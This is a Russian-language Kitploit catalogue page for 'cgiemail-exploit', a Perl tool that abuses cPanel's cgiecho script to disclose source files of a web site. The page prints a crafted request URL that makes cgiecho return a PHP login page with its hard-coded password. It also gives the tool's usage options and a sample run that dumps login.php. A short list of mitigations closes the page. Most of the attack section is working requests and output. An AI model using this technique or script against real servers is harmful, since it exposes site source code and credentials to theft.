Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cgiemail-exploit — Cgiemail - Source Code Disclosure/LFI | Kitploit
Инструменты/GitHubGitHub/finbar-crago/cgiemail-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubfinbar-crago/cgiemail-exploit

cgiemail-exploit

Cgiemail - Source Code Disclosure/LFI

Репозиторий
1519 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Cgiemail - раскрытие исходного кода / эксплойт локального включения файлов

cgiecho — скрипт, входящий в состав cgiemail, вернёт любой файл в пределах корня документов веб-сайта, если файл содержит квадратные скобки, а текст внутри скобок можно угадать.

cgiemail в настоящее время поставляется с cPanel и включён по умолчанию.

screen-shot

Пример

Для страницы:

root@kitploit:~
<?php // http://hostname/login.php
if($_GET['user'] == 'admin' && $_GET['pass'] == 'thisissecure'){ /*...*/ }

Запрос:

root@kitploit:~
http://hostname/cgi-sys/cgiecho/login.php?'pass'=['pass']

Возвращает:

root@kitploit:~
<HEAD><TITLE>Success</TITLE></HEAD>
<BODY>Processed form looks like this:<P><HR><PRE>
&lt;?php // http://hostname/login.php
if($_GET == 'admin' && $_GET['pass'] == 'thisissecure'){ /*..*/ }
</PRE><P>
<P><EM>cgiemail 
1.6
</EM></BODY>

cgiemail-exploit.pl

root@kitploit:~
Usage: ./cgiemail-exploit.pl [options] target

Options:
  --names         Check for names in commer separated list
  --num           Check for numbers
  --num-max       Maximum number to check (default 10)
  --php           Check PHP $_SERVER Variables
  --batch         Number of arguments sent per request (default 10)
  --cgiecho-path  Path of cgiecho on server (default '/cgi-sys/cgiecho/')
  --user-agent    Set user-agent (default 'Mozilla/5.0')
  --deley         Pause between requests in seconds (default 1)
  --timeout       Set connection timeout (default 10)

пример

root@kitploit:~
$ ./cgiemail-exploit.pl --num --names 'email,password' http://hostname/login.php > login.php
detected cgiemail 1.6
request 1 of 2...
success!
url: http://hostname//cgi-sys/cgiecho/login.php?0=[0]&1=[1]&2=[2]&3=[3]&4=[4]&5=[5]&6=[6]&7=[7]&8=[8]&9=[9]&

предостережения

  • если для переменной не указано значение, она будет исключена, поэтому ожидайте увидеть некоторые переменные '$_POST/$_GET' без []...

Решения

  • не используйте cgiemail...
  • отключите cgiemail...
  • если по какой-то причине вы застряли в системе с cgiemail, максимальная длина переменной составляет 255; длинная строка внутри квадратных скобок приведёт к ошибке.
  • не используйте квадратные скобки?

Ссылки

  • http://web.mit.edu/wwwdev/cgiemail/webmaster.html#security
  • https://documentation.cpanel.net/display/1144Docs/Tweak+Settings+-+Security#TweakSettings-Security-CGIEmailandCGIEcho
Скачать инструмент